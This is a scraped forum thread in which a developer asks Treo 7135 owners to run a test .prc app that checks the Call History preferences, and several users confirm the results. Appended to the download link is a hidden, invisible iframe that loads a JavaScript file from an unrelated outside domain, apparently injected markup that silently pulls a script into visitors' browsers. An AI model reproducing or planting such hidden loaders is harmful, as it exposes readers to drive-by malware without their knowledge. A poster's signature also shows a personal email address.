+ Reply to Thread

7135 Test App - Need a Tester Please

I need to know (for Minutes PLUS inclusion), what the Call History application preferences look like. If someone with a 7135 could download the app below, run it and report the results back I'd appreciate it.

Steps would be as follows:

1. Run Call History app. Go to Options/Preferences and note the Max # of calls figure.
    2. Download and install the prc file below. Run it and note the 2 numbers shown. Verify that the max call count is the same as what you saw in the Call History app.
    3. If the max # is not the same in both places let me know - I'll have to expand the test further. I will need to know the # of "bytes in pref".

4. If they were the same, go back to the Call History and change the Max # figure.
    5. Go back to the test app and recheck to make sure it sees the changed max #. Report this along with the "bytes in pref" figure.

Thanks!

http://home.triad.rr.com/rlwhitt/pal...TestCHPref.prc<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It detected the correct max # both times. There are 58 bytes in prefs. Glad to be able to help a developer!
    ---------------
    The same thing we do every night, Pinky...

Thanks guys, that's 2 verifications. I've got what I need to know!

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

same here also

same here also rick..
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com